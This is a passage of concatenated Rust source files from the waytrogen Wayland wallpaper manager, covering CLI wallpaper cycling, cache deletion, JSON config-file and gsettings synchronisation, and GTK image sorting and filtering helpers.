&string_to_gschema_string(&serde_json::to_string(&previous_wallpapers).unwrap_or_default()), ) { Ok(_) => {} Err(e) => { error!("{} {e}", gettext("Unable to save \"next\" wallpapers")); } } glib::ExitCode::SUCCESS } #[must_use] pub fn print_app_version() -> glib::ExitCode { println!("{APP_VERSION}"); glib::ExitCode::SUCCESS } #[must_use] pub fn cycle_next_wallpaper(args: &Cli) -> glib::ExitCode { let settings = Settings::new(APP_ID); let mut previous_wallpapers = get_previous_wallpapers(&settings); let sort_dropdown_string = SORT_DROPDOWN_STRINGS[settings.uint("sort-by") as usize]; let mut files = get_previous_supported_wallpapers(&settings); let invert_sort_state = settings.boolean("invert-sort"); sort_by_sort_dropdown_string(&mut files, sort_dropdown_string, invert_sort_state); if 
args.next.clone().unwrap_or_default() == "All" { for previous_wallpaper in &mut previous_wallpapers { let wallpaper_index = files.iter().position(|p| { p.clone() == previous_wallpaper .path .parse::<PathBuf>() .unwrap_or_default() }); try_set_next_wallpaper(&files, wallpaper_index, previous_wallpaper); } } else { let previous_wallpaper = previous_wallpapers .iter() .find(|w| *w.monitor == args.next.clone().unwrap_or_default()); if previous_wallpaper.is_none() { error!( "Display \"{}\" does not exist.", args.next.clone().unwrap_or_default() ); return glib::ExitCode::FAILURE; } let mut previous_wallpaper = previous_wallpaper.unwrap().clone(); try_set_next_wallpaper( &files, files.iter().position(|f| { *f == previous_wallpaper .path .parse::<PathBuf>() .unwrap_or_default() }), &mut previous_wallpaper, ); let index = previous_wallpapers .iter() .position(|w| w.monitor == previous_wallpaper.monitor) .unwrap(); previous_wallpapers[index] = previous_wallpaper; } match settings.set_string( "saved-wallpapers", &string_to_gschema_string(&serde_json::to_string(&previous_wallpapers).unwrap_or_default()), ) { Ok(_) => {} Err(e) => { error!("{} {e}", gettext("Unable to save \"next\" wallpapers")); } } glib::ExitCode::SUCCESS } fn try_set_next_wallpaper( files: &[PathBuf], position: Option<usize>, previous_wallpaper: &mut Wallpaper, ) { if let Some(i) = position { let path = &files[(i + 1) % files.len()]; previous_wallpaper .changer .clone() .change(path.clone(), previous_wallpaper.monitor.clone()); previous_wallpaper.path = path.to_str().unwrap_or_default().to_owned(); } else { warn!( "Wallpaper {} could not be found. Using first wallpaper", previous_wallpaper .path .parse::<PathBuf>() .unwrap_or_default() .display() ); match files.first() { Some(p) => { previous_wallpaper .changer .clone() .change(p.clone(), previous_wallpaper.monitor.clone()); previous_wallpaper.path = p.to_str().unwrap_or_default().to_owned(); } None => { error!("Wallpaper directory is empty. 
Please set a wallpaper folder before using --next."); } } } } pub fn delete_image_cache() -> glib::ExitCode { let xdg_dirs = xdg::BaseDirectories::with_prefix(CONFIG_APP_NAME); if xdg_dirs.is_err() { error!( "Failed to get XDG base dirrectory, {}", xdg_dirs.err().unwrap() ); return glib::ExitCode::FAILURE; } let xdg_dirs = xdg_dirs.unwrap(); let cache_path = xdg_dirs.place_cache_file(CACHE_FILE_NAME); if cache_path.is_err() { error!("Failed to get cache path, {}", cache_path.err().unwrap()); return glib::ExitCode::FAILURE; } match remove_file(cache_path.unwrap()) { Ok(_) => glib::ExitCode::SUCCESS, Err(e) => { error!("Failed to delete cache {e}"); glib::ExitCode::FAILURE } } } #[must_use] pub fn launch_application(args: Cli) -> glib::ExitCode { let app = Application::builder().application_id(APP_ID).build(); textdomain("waytrogen").unwrap(); bind_textdomain_codeset("waytrogen", "UTF-8").unwrap(); let os_id = get_os_id().unwrap().unwrap_or_default(); let domain_directory = match os_id.as_str() { "nixos" => { #[cfg(feature = "nixos")] // the path is known at compile time when using nix to build waytrogen { let path = env!("OUT_PATH").parse::<PathBuf>().unwrap(); path.join("share").join("locale") } #[cfg(not(feature = "nixos"))] { let exe_path = current_exe().unwrap(); exe_path .parent() .unwrap() .parent() .unwrap() .parent() .unwrap() .join("share") .join("locale") } } _ => getters::domain_directory(GETTEXT_DOMAIN).unwrap(), }; bindtextdomain(GETTEXT_DOMAIN, domain_directory).unwrap(); app.connect_activate(move |app| { build_ui(app, &args); }); let empty: Vec<String> = vec![]; // Run the application app.run_with_args(&empty) } /// os id is the ID="nixos" parameter in `/etc/os-release` /// If ID parameter is not found this returns None fn get_os_id() -> anyhow::Result<Option<String>> { let file = File::open("/etc/os-release")?; let reader = BufReader::new(file); for line in reader.lines() { let line = line?; if let Some(s) = line.strip_prefix("ID=") { let id = 
s.trim_matches('"'); return Ok(Some(id.to_string())); } } Ok(None) } #[derive(Parser, Clone)] pub struct Cli { #[arg(short, long)] /// Restore previously set wallpapers. pub restore: bool, #[arg(long, default_value_t = 0)] /// How many error, warning, info, debug or trace logs will be shown. 0 for error, 1 for warning, 2 for info, 3 for debug, 4 or higher for trace. pub log_level: u8, #[arg(short, long, default_value_t = false)] /// Get the current wallpaper settings in JSON format. pub list_current_wallpapers: bool, #[arg(short, long, value_parser = parse_executable_script)] /// Path to external script. pub external_script: Option<String>, #[arg(long)] /// Set random wallpapers based on last set changer. pub random: bool, #[arg(short, long)] /// Get application version. pub version: bool, #[arg(short, long)] /// Cycle wallaper(s) the next on based on the previously set wallpaper(s) and sort settings on a given monitor. "All" cycles wallpapers on all monitors. pub next: Option<String>, #[arg(short, long, default_value_t = 0)] /// Startup delay to allow monitors to initialize. pub startup_delay: u64, #[arg(short, long)] /// Delete image cache. pub delete_cache: bool, #[arg(short, long)] /// Hide bottom bar pub hide_bottom_bar: Option<bool>, }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/dotfile.rs
src/dotfile.rs
use crate::common::{ get_config_file_path, parse_executable_script, Wallpaper, APP_ID, }; use anyhow::anyhow; use gettextrs::gettext; use log::{error, trace, warn}; use serde::{Deserialize, Serialize}; use std::{ fs::{remove_file, OpenOptions}, io::{Read, Write}, }; use gtk::{gio::Settings, prelude::*}; #[derive(Clone, Serialize, Deserialize)] pub struct ConfigFile { executable_script_doc: String, pub executable_script: String, wallpaper_folder_doc: String, pub wallpaper_folder: String, saved_wallpapers_doc: String, pub saved_wallpapers: Vec<Wallpaper>, monitor_doc: String, pub monitor: u32, sort_by_doc: String, pub sort_by: u32, invert_sort_doc: String, pub invert_sort: bool, changer_doc: String, pub changer: u32, image_filter_doc: String, pub image_filter: String, swaybg_mode_doc: String, pub swaybg_mode: u32, swaybg_color_doc: String, pub swaybg_color: String, mpvpaper_pause_option_doc: String, pub mpvpaper_pause_option: u32, mpvpaper_slideshow_enable_doc: String, pub mpvpaper_slideshow_enable: bool, mpvpaper_slideshow_interval_doc: String, pub mpvpaper_slideshow_interval: f64, mpvpaper_additional_options_doc: String, pub mpvpaper_additional_options: String, selected_monitor_item_doc: String, pub selected_monitor_item: String, swww_resize_doc: String, pub swww_resize: u32, swww_fill_color_doc: String, pub swww_fill_color: String, swww_scaling_filter_doc: String, pub swww_scaling_filter: u32, swww_transition_type_doc: String, pub swww_transition_type: u32, swww_transition_step_doc: String, pub swww_transition_step: f64, swww_transition_duration_doc: String, pub swww_transition_duration: f64, swww_transition_angle_doc: String, pub swww_transition_angle: f64, swww_transition_position_doc: String, pub swww_transition_position: String, swww_invert_y_doc: String, pub swww_invert_y: bool, swww_transition_wave_width_doc: String, pub swww_transition_wave_width: f64, swww_transition_wave_height_doc: String, pub swww_transition_wave_height: f64, 
swww_transition_bezier_p0_doc: String, pub swww_transition_bezier_p0: f64, swww_transition_bezier_p1_doc: String, pub swww_transition_bezier_p1: f64, swww_transition_bezier_p2_doc: String, pub swww_transition_bezier_p2: f64, swww_transition_bezier_p3_doc: String, pub swww_transition_bezier_p3: f64, swww_transition_fps_doc: String, pub swww_transition_fps: u32, hide_changer_options_box_doc: String, pub hide_changer_options_box: bool } impl Default for ConfigFile { fn default() -> Self { Self{ executable_script_doc: gettext("The path to executable script used after a wallpaper is set. The script is sent the monitor identifier, wallpaper path and the serialized saved_wallpapers state."), executable_script: String::default(), wallpaper_folder_doc: gettext("The path to the currently selected wallpaper folder. Note: The path cannot have a trailing forward slash."), wallpaper_folder: String::default(), saved_wallpapers_doc: gettext("The collection of the currently saved wallpapers with their corresponding monitor, path and changer."), saved_wallpapers: vec![Wallpaper::default()], monitor_doc: gettext("The internal numeric identifier in the monitor dropdown used by dconf for the currently selected monitor. Do not change unless you know what you are doing."), monitor: u32::default(), sort_by_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected sorting option. Do not change unless you know what you are doing."), sort_by: u32::default(), invert_sort_doc: gettext("The boolean flag to invert the currently selected sort-by option in the sort dropdown used by dconf."), invert_sort: bool::default(), changer_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected changer. 
Do not change unless you know what you are doing."), changer: u32::default(), image_filter_doc: gettext("The search string for the wallpapers."), image_filter: String::default(), swaybg_mode_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected swaybg mode. Do not change unless you know what you are doing."), swaybg_mode: u32::default(), swaybg_color_doc: gettext("The hex color for swaybg background fill. Must be six characters long."), swaybg_color: String::from("000000"), mpvpaper_pause_option_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected mpvpaper pause option. Do not change unless you know what you are doing."), mpvpaper_pause_option: u32::default(), mpvpaper_slideshow_enable_doc: gettext("The boolean flag to enable/disable slideshows for mpvpaper used by dconf."), mpvpaper_slideshow_enable: bool::default(), mpvpaper_slideshow_interval_doc: gettext("The number of seconds of that mpvpaper takes between switching images in slideshow mode. Note: The option must be a positive floating point number."), mpvpaper_slideshow_interval: f64::default(), mpvpaper_additional_options_doc: gettext("Custom options for mpvpaper passed as command line arguments."), mpvpaper_additional_options: String::default(), selected_monitor_item_doc: gettext("The currently selected monitor as a string. Note: The name must coincide with the monitor numeric identifier."), selected_monitor_item: String::default(), swww_resize_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected swww resize option. Do not change unless you know what you are doing."), swww_resize: u32::default(), swww_fill_color_doc: gettext("The hex color for swww background fill. 
Must be six characters long."), swww_fill_color: String::from("000000"), swww_scaling_filter_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected swww scaling filter option. Do not change unless you know what you are doing."), swww_scaling_filter: u32::default(), swww_transition_type_doc: gettext("The internal numeric identifier in the changer dropdown used by dconf for the currently selected swww transition type option. Do not change unless you know what you are doing."), swww_transition_type: 1, swww_transition_step_doc: gettext("How fast the transition approaches the new image used by swww."), swww_transition_step: 90.0, swww_transition_duration_doc: gettext("How long the transition takes to complete in seconds used by swww."), swww_transition_duration: 3.0, swww_transition_angle_doc: gettext("Used for the 'wipe' and 'wave' transitions used by swww. It controls the angle of the wipe."), swww_transition_angle: 45.0, swww_transition_position_doc: gettext("This is only used for the 'grow','outer' transitions used by swww. 
It controls the center of circle."), swww_transition_position: String::from("center"), swww_invert_y_doc: gettext("Inverts the y position sent in 'transition_pos' flag used by swww."), swww_invert_y: bool::default(), swww_transition_wave_width_doc: gettext("Currently only used for 'wave' transition to control the width of each wave used by swww."), swww_transition_wave_width: 200.0, swww_transition_wave_height_doc: gettext("Currently only used for 'wave' transition to control the height of each wave used by swww."), swww_transition_wave_height: 200.0, swww_transition_bezier_p0_doc: gettext("Point 0 for the Bezier curve to use for the transition"), swww_transition_bezier_p0: 0.54, swww_transition_bezier_p1_doc: gettext("Point 1 for the Bezier curve to use for the transition"), swww_transition_bezier_p1: 0.0, swww_transition_bezier_p2_doc: gettext("Point 2 for the Bezier curve to use for the transition"), swww_transition_bezier_p2: 0.34, swww_transition_bezier_p3_doc: gettext("Point 3 for the Bezier curve to use for the transition"), swww_transition_bezier_p3: 0.99, swww_transition_fps_doc: gettext("Frame rate for the transition effect used by swww."), swww_transition_fps: 30, hide_changer_options_box_doc: gettext("Hide bottom bar."), hide_changer_options_box: false } } } impl ConfigFile { pub fn write_to_config_file(&self) -> anyhow::Result<()> { let config_file = get_config_file_path()?; let config_contents = serde_json::to_string_pretty(&self)?; let mut config_file = OpenOptions::new() .write(true) .truncate(true) .create(true) .open(&config_file)?; config_file.write_all(config_contents.as_bytes())?; Ok(()) } pub fn from_gsettings() -> anyhow::Result<Self> { let settings = Settings::new(APP_ID); let executable_script = get_config_file()?.executable_script; trace!("Getting wallpaper-folder gsetting"); let wallpaper_folder = settings.string("wallpaper-folder").to_string(); trace!("Getting saved-wallpapers gsetting"); let saved_wallpapers: Vec<Wallpaper> = 
serde_json::from_str( &settings .string("saved-wallpapers") .to_string() .replace(r"\", ""), )?; trace!("Getting monitor gsetting"); let monitor = settings.uint("monitor"); trace!("Getting sort-by gsetting"); let sort_by = settings.uint("sort-by"); trace!("Getting invert-sort gsetting"); let invert_sort = settings.boolean("invert-sort"); trace!("Getting changer gsetting"); let changer = settings.uint("changer"); trace!("Getting image-filter gsetting"); let image_filter = settings.string("image-filter").to_string(); trace!("Getting swaybg-mode gsetting"); let swaybg_mode = settings.uint("swaybg-mode"); trace!("Getting swaybg-color gsetting"); let swaybg_color = settings.string("swaybg-color").to_string(); trace!("Getting mpvpaper-pause-option gsetting"); let mpvpaper_pause_option = settings.uint("mpvpaper-pause-option"); trace!("Getting mpvpaper-slideshow-enable gsetting"); let mpvpaper_slideshow_enable = settings.boolean("mpvpaper-slideshow-enable"); trace!("Getting mpvpaper-slideshow-interval gsetting"); let mpvpaper_slideshow_interval = settings.double("mpvpaper-slideshow-interval"); trace!("Getting mpvpaper-additional-options gsetting"); let mpvpaper_additional_options = settings.string("mpvpaper-additional-options").to_string(); trace!("Getting selected-monitor-item gsetting"); let selected_monitor_item = settings.string("selected-monitor-item").to_string(); trace!("Getting swww-resize gsetting"); let swww_resize = settings.uint("swww-resize"); trace!("Getting swww-fill-color gsetting"); let swww_fill_color = settings.string("swww-fill-color").to_string(); trace!("Getting swww-scaling-filter gsetting"); let swww_scaling_filter = settings.uint("swww-scaling-filter"); trace!("Getting swww-transition-type gsetting"); let swww_transition_type = settings.uint("swww-transition-type"); trace!("Getting swww-transition-step gsetting"); let swww_transition_step = settings.double("swww-transition-step"); trace!("Getting swww-transition-duration gsetting"); let 
swww_transition_duration = settings.double("swww-transition-duration"); trace!("Getting swww-transition-angle gsetting"); let swww_transition_angle = settings.double("swww-transition-angle"); trace!("Getting swww-transition-position gsetting"); let swww_transition_position = settings.string("swww-transition-position").to_string(); trace!("Getting swww-invert-y gsetting"); let swww_invert_y = settings.boolean("swww-invert-y"); trace!("Getting swww-transition-wave-width gsetting"); let swww_transition_wave_width = settings.double("swww-transition-wave-width"); trace!("Getting swww-transition-wave-height gsetting"); let swww_transition_wave_height = settings.double("swww-transition-wave-height"); trace!("Getting swww-transition-bezier-p0 gsetting"); let swww_transition_bezier_p0 = settings.double("swww-transition-bezier-p0"); trace!("Getting swww-transition-bezier-p1 gsetting"); let swww_transition_bezier_p1 = settings.double("swww-transition-bezier-p1"); trace!("Getting swww-transition-bezier-p2 gsetting"); let swww_transition_bezier_p2 = settings.double("swww-transition-bezier-p2"); trace!("Getting swww-transition-bezier-p3 gsetting"); let swww_transition_bezier_p3 = settings.double("swww-transition-bezier-p3"); trace!("Getting swww-transition-fps gsetting"); let swww_transition_fps = settings.uint("swww-transition-fps"); trace!("Getting hide-changer-options-box gsetting"); let hide_changer_options_box = settings.boolean("hide-changer-options-box"); Ok(Self { executable_script, wallpaper_folder, saved_wallpapers, monitor, sort_by, invert_sort, changer, image_filter, swaybg_mode, swaybg_color, mpvpaper_pause_option, mpvpaper_slideshow_enable, mpvpaper_slideshow_interval, mpvpaper_additional_options, selected_monitor_item, swww_resize, swww_fill_color, swww_scaling_filter, swww_transition_type, swww_transition_step, swww_transition_duration, swww_transition_angle, swww_transition_position, swww_invert_y, swww_transition_wave_width, swww_transition_wave_height, 
swww_transition_bezier_p0, swww_transition_bezier_p1, swww_transition_bezier_p2, swww_transition_bezier_p3, swww_transition_fps, hide_changer_options_box, ..Default::default() }) } pub fn write_to_gsettings(&self) -> anyhow::Result<()> { let settings = Settings::new(APP_ID); settings.set_string("wallpaper-folder", &self.wallpaper_folder)?; settings.set_string( "saved-wallpapers", &serde_json::to_string_pretty(&self.saved_wallpapers)?, )?; trace!("Setting monitor gsetting."); settings.set_uint("monitor", self.monitor)?; trace!("Setting sort-by gsetting"); settings.set_uint("sort-by", self.sort_by)?; trace!("Setting invert-sort gsetting"); settings.set_boolean("invert-sort", self.invert_sort)?; trace!("Setting changer gsetting"); settings.set_uint("changer", self.changer)?; trace!("Setting image-filter gsetting"); settings.set_string("image-filter", &self.image_filter)?; trace!("Setting swaybg-mode gsetting"); settings.set_uint("swaybg-mode", self.swaybg_mode)?; trace!("Setting swaybg-color gsetting"); settings.set_string("swaybg-color", &self.swaybg_color)?; trace!("Setting mpvpaper-pause-option gsetting"); settings.set_uint("mpvpaper-pause-option", self.mpvpaper_pause_option)?; trace!("Setting mpvpaper-slideshow-enable gsetting"); settings.set_boolean("mpvpaper-slideshow-enable", self.mpvpaper_slideshow_enable)?; trace!("Setting mpvpaper-slideshow-interval gsetting"); settings.set_double( "mpvpaper-slideshow-interval", self.mpvpaper_slideshow_interval, )?; trace!("Setting mpvpaper-additional-options gsetting"); settings.set_string( "mpvpaper-additional-options", &self.mpvpaper_additional_options, )?; trace!("Setting selected-monitor-item gsetting"); settings.set_string("selected-monitor-item", &self.selected_monitor_item)?; trace!("Setting swww-resize gsetting"); settings.set_uint("swww-resize", self.swww_resize)?; trace!("Setting swww-fill-color gsetting"); settings.set_string("swww-fill-color", &self.swww_fill_color)?; trace!("Setting swww-scaling-filter 
gsetting"); settings.set_uint("swww-scaling-filter", self.swww_scaling_filter)?; trace!("Setting swww-transition-type gsetting"); settings.set_uint("swww-transition-type", self.swww_transition_type)?; trace!("Setting swww-transition-step gsetting"); settings.set_double("swww-transition-step", self.swww_transition_step)?; trace!("Setting swww-transition-duration gsetting"); settings.set_double("swww-transition-duration", self.swww_transition_duration)?; trace!("Setting swww-transition-angle gsetting"); settings.set_double("swww-transition-angle", self.swww_transition_angle)?; trace!("Setting swww-transition-position gsetting"); settings.set_string("swww-transition-position", &self.swww_transition_position)?; trace!("Setting swww-invert-y gsetting"); settings.set_boolean("swww-invert-y", self.swww_invert_y)?; trace!("Setting swww-transition-wave-width gsetting"); settings.set_double( "swww-transition-wave-width", self.swww_transition_wave_width, )?; trace!("Setting swww-transition-wave-height gsetting"); settings.set_double( "swww-transition-wave-height", self.swww_transition_wave_height, )?; trace!("Setting swww-transition-bezier-p0 gsetting"); settings.set_double("swww-transition-bezier-p0", self.swww_transition_bezier_p0)?; trace!("Setting swww-transition-bezier-p1 gsetting"); settings.set_double("swww-transition-bezier-p1", self.swww_transition_bezier_p1)?; trace!("Setting swww-transition-bezier-p2 gsetting"); settings.set_double("swww-transition-bezier-p2", self.swww_transition_bezier_p2)?; trace!("Setting swww-transition-bezier-p3 gsetting"); settings.set_double("swww-transition-bezier-p3", self.swww_transition_bezier_p3)?; trace!("Setting swww-transition-fps gsetting"); settings.set_uint("swww-transition-fps", self.swww_transition_fps)?; trace!("Setting hide-changer-options-box gsetting"); settings.set_boolean("hide-changer-options-box", self.hide_changer_options_box)?; Ok(()) } } pub fn get_config_file() -> anyhow::Result<ConfigFile> { let config_file = 
get_config_file_path()?; let mut config = match config_file.exists() { true => OpenOptions::new() .read(true) .write(true) .create(false) .open(&config_file)?, false => { warn!("Config file was not found: Attempting to create a new one."); OpenOptions::new() .read(true) .write(true) .create(true) .truncate(true) .open(&config_file)? } }; let mut config_contents = String::new(); let _ = config.read_to_string(&mut config_contents)?; let config_file_struct = match serde_json::from_str::<ConfigFile>(&config_contents) { Ok(s) => { trace!("{}", "Successfully obtained configuration file"); s } Err(_) => { remove_file(&config_file)?; config = OpenOptions::new() .read(true) .write(true) .create(true) .truncate(true) .open(&config_file)?; let config_file = ConfigFile::default(); let config_string = serde_json::to_string_pretty::<ConfigFile>(&config_file)?; config.write_all(config_string.as_bytes())?; config_file } }; match parse_executable_script(&config_file_struct.executable_script) { Ok(_) => { trace!("{}", "Successfully parsed executable script"); } Err(e) => { error!("Failed to parse executable script: {e}"); return Err(anyhow!("Failed to parse executable script: {e}")); } }; Ok(config_file_struct) }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/ui_common.rs
src/ui_common.rs
use crate::{ common::{CacheImageFile, GtkPictureFile, RGB}, database::DatabaseConnection, fs::get_image_files, mpvpaper::generate_mpvpaper_changer_bar, swaybg::generate_swaybg_changer_bar, swww::generate_swww_changer_bar, wallpaper_changers::{ MpvPaperPauseModes, MpvPaperSlideshowSettings, SWWWResizeMode, SWWWScallingFilter, SWWWTransitionBezier, SWWWTransitionPosition, SWWWTransitionType, SWWWTransitionWave, SwaybgModes, U32Enum, WallpaperChanger, WallpaperChangers, }, }; use async_channel::Sender; use gettextrs::gettext; use gtk::{ self, gdk::Display, gio::{spawn_blocking, ListStore, Settings}, glib::{BoxedAnyObject, Object}, prelude::*, Box, DropDown, GridView, ListItem, ListScrollFlags, StringObject, Switch, }; use log::debug; use std::{ cell::Ref, cmp::Ordering, path::{Path, PathBuf}, str::FromStr, }; pub const SORT_DROPDOWN_STRINGS: [&str; 2] = ["Date", "Name"]; pub fn generate_image_files( path: String, sender_cache_images: Sender<CacheImageFile>, sort_dropdown: String, invert_sort_switch_state: bool, sender_changer_options: Sender<bool>, sender_images_loading_progress_bar: Sender<f64>, ) { spawn_blocking(move || { sender_changer_options .send_blocking(false) .unwrap_or_else(|_| panic!("{}", gettext("The channel must be open"))); let files = get_image_files(&path, &sort_dropdown, invert_sort_switch_state); for (index, file) in files.iter().enumerate() { sender_images_loading_progress_bar .send_blocking((index as f64) / (files.len() as f64)) .unwrap_or_else(|_| panic!("{}", gettext("The channel must be open"))); if let Ok(i) = DatabaseConnection::check_cache(file) { sender_cache_images .send_blocking(i) .unwrap_or_else(|_| panic!("{}", gettext("The channel must be open"))); } } sender_changer_options .send_blocking(true) .unwrap_or_else(|_| panic!("{}", gettext("The channel must be open"))); }); } pub fn change_image_button_handlers( image_list_store: &ListStore, wallpaper_changers_dropdown: &DropDown, selected_monitor_dropdown: &DropDown, settings: 
&Settings, ) { image_list_store .into_iter() .filter_map(std::result::Result::ok) .filter_map(|o| o.downcast::<ListItem>().ok()) .for_each(|li| { let entry = li.item().and_downcast::<BoxedAnyObject>().unwrap(); let image: Ref<CacheImageFile> = entry.borrow(); let selected_monitor = selected_monitor_dropdown .selected_item() .unwrap() .downcast::<StringObject>() .unwrap() .string() .to_string(); let selected_changer = get_selected_changer(wallpaper_changers_dropdown, settings); selected_changer.change(PathBuf::from(&image.path), selected_monitor); }); } pub fn generate_changer_bar( changer_specific_options_box: &Box, selected_changer: &WallpaperChangers, settings: Settings, ) { while changer_specific_options_box.first_child().is_some() { changer_specific_options_box.remove(&changer_specific_options_box.first_child().unwrap()); } match selected_changer { WallpaperChangers::Hyprpaper => {} WallpaperChangers::Swaybg(_, _) => { generate_swaybg_changer_bar(changer_specific_options_box, &settings); } WallpaperChangers::MpvPaper(_, _, _) => { generate_mpvpaper_changer_bar(changer_specific_options_box, settings); } WallpaperChangers::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => { generate_swww_changer_bar(changer_specific_options_box, settings); } } } #[must_use] pub fn get_selected_changer( wallpaper_changers_dropdown: &DropDown, settings: &Settings, ) -> WallpaperChangers { let selected_item = wallpaper_changers_dropdown .selected_item() .unwrap() .downcast::<StringObject>() .unwrap() .string() .to_string() .to_lowercase(); match &selected_item[..] 
{ "swaybg" => { let mode = SwaybgModes::from_u32(settings.uint("swaybg-mode")); let rgb = settings.string("swaybg-color").to_string(); WallpaperChangers::Swaybg(mode, rgb) } "mpvpaper" => { let pause_mode = MpvPaperPauseModes::from_u32(settings.uint("mpvpaper-pause-option")); let slideshow_enable = settings.boolean("mpvpaper-slideshow-enable"); let slideshow_interval = settings.double("mpvpaper-slideshow-interval") as u32; let options = settings.string("mpvpaper-additional-options").to_string(); let changer = WallpaperChangers::MpvPaper( pause_mode, MpvPaperSlideshowSettings { enable: slideshow_enable, seconds: slideshow_interval, }, options.clone(), ); debug!( "{}: {} {} {} {}", gettext("Selected changer"), changer, slideshow_enable, slideshow_interval, options ); changer } "swww" => { let resize = SWWWResizeMode::from_u32(settings.uint("swww-resize")); let fill_color = RGB::from_str(settings.string("swww-fill-color").as_str()).unwrap(); let scaling_filter = SWWWScallingFilter::from_u32(settings.uint("swww-scaling-filter")); let transition_type = SWWWTransitionType::from_u32(settings.uint("swww-transition-type")); let transition_step = settings.double("swww-transition-step") as u8; let transition_duration = settings.double("swww-transition-duration") as u32; let transition_angle = settings.double("swww-transition-angle") as u16; let transition_position = SWWWTransitionPosition::new(settings.string("swww-transition-position").as_str()) .unwrap(); let invert_y = settings.boolean("swww-invert-y"); let transition_wave = SWWWTransitionWave { width: settings.double("swww-transition-wave-width") as u32, height: settings.double("swww-transition-wave-height") as u32, }; let transition_bezier = SWWWTransitionBezier { p0: settings.double("swww-transition-bezier-p0"), p1: settings.double("swww-transition-bezier-p1"), p2: settings.double("swww-transition-bezier-p2"), p3: settings.double("swww-transition-bezier-p3"), }; let transition_fps = settings.uint("swww-transition-fps"); 
WallpaperChangers::Swww( resize, fill_color, scaling_filter, transition_type, transition_step, transition_duration, transition_fps, transition_angle, transition_position, invert_y, transition_bezier, transition_wave, ) } _ => WallpaperChangers::Hyprpaper, } } pub fn sort_images( sort_dropdown: &DropDown, invert_sort_switch: &Switch, image_list_store: &ListStore, image_grid: &GridView, ) { image_list_store.sort(compare_image_list_items_by_sort_selection_comparitor( sort_dropdown.clone(), invert_sort_switch.clone(), )); if image_list_store.into_iter().len() != 0 { image_grid.scroll_to(0, ListScrollFlags::FOCUS, None); } } pub fn hide_unsupported_files( image_list_store: &ListStore, current_changer: &WallpaperChangers, removed_images_list_store: &ListStore, sort_dropdown: &DropDown, invert_sort_switch: &Switch, name_filter: &str, ) { removed_images_list_store .into_iter() .filter_map(std::result::Result::ok) .for_each(|o| { let b = o.downcast::<BoxedAnyObject>().unwrap(); image_list_store.insert_sorted( &b, compare_image_list_items_by_sort_selection_comparitor( sort_dropdown.clone(), invert_sort_switch.clone(), ), ); }); removed_images_list_store.remove_all(); let ls = image_list_store .into_iter() .filter_map(std::result::Result::ok) .collect::<Vec<_>>(); debug!("Filtered list store size: {}", ls.len()); for o in ls { let item = o.clone().downcast::<BoxedAnyObject>().unwrap(); let image_file: Ref<GtkPictureFile> = item.borrow(); if !current_changer.accepted_formats().contains( &Path::new(&image_file.cache_image_file.path) .extension() .unwrap_or_default() .to_str() .unwrap_or_default() .to_owned(), ) || !&image_file .cache_image_file .name .to_lowercase() .contains(&name_filter.to_lowercase()) { debug!( "Image name: {}, Name Filter: {name_filter}, Contains: {}", &image_file.cache_image_file.name, &image_file.cache_image_file.name.contains(name_filter) ); transfer_and_remove_image(removed_images_list_store, image_list_store, &o, &item); } } } fn 
transfer_and_remove_image( removed_images_list_store: &ListStore, image_list_store: &ListStore, o: &Object, item: &BoxedAnyObject, ) { removed_images_list_store.append(item); image_list_store.remove(image_list_store.find(o).unwrap()); } #[must_use] pub fn gschema_string_to_string(s: &str) -> String { s.replace("\\\"", "\"") .replace("\\{", "{") .replace("\\}", "}") } #[must_use] pub fn string_to_gschema_string(s: &str) -> String { s.replace('"', "\\\"") .replace('{', "\\{") .replace('}', "\\}") } pub fn compare_image_list_items_by_sort_selection_comparitor( sort_dropdown: DropDown, invert_sort_switch: Switch, ) -> impl Fn(&Object, &Object) -> Ordering { move |img1, img2| { let invert_sort_switch_state = invert_sort_switch.state(); match &sort_dropdown .selected_item() .unwrap() .downcast::<StringObject>() .unwrap() .string() .to_lowercase() .to_string()[..] { "name" => { compare_image_list_items_by_name_comparitor(invert_sort_switch_state)(img1, img2) } _ => compare_image_list_items_by_date_comparitor(invert_sort_switch_state)(img1, img2), } } } pub fn compare_image_list_items_by_name_comparitor( invert_sort_switch_state: bool, ) -> impl Fn(&Object, &Object) -> Ordering { move |img1, img2| { let image1 = img1.downcast_ref::<BoxedAnyObject>().unwrap(); let image1: Ref<GtkPictureFile> = image1.borrow(); let image2 = img2.downcast_ref::<BoxedAnyObject>().unwrap(); let image2: Ref<GtkPictureFile> = image2.borrow(); if invert_sort_switch_state { image1 .cache_image_file .name .partial_cmp(&image2.cache_image_file.name) .unwrap() } else { image2 .cache_image_file .name .partial_cmp(&image1.cache_image_file.name) .unwrap() } } } pub fn compare_image_list_items_by_date_comparitor( invert_sort_switch_state: bool, ) -> impl Fn(&Object, &Object) -> Ordering { move |img1, img2| { let image1 = img1.downcast_ref::<BoxedAnyObject>().unwrap(); let image1: Ref<GtkPictureFile> = image1.borrow(); let image2 = img2.downcast_ref::<BoxedAnyObject>().unwrap(); let image2: 
Ref<GtkPictureFile> = image2.borrow(); if invert_sort_switch_state { image1 .cache_image_file .date .partial_cmp(&image2.cache_image_file.date) .unwrap() } else { image2 .cache_image_file .date .partial_cmp(&image1.cache_image_file.date) .unwrap() } } } pub fn get_available_monitors() -> Vec<String> { let monitors = Display::default().unwrap().monitors(); monitors .into_iter() .filter_map(std::result::Result::ok) .filter_map(|o| o.downcast::<gtk::gdk::Monitor>().ok()) .filter_map(|m| m.connector()) .map(|s| s.to_string()) .collect::<Vec<_>>() }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
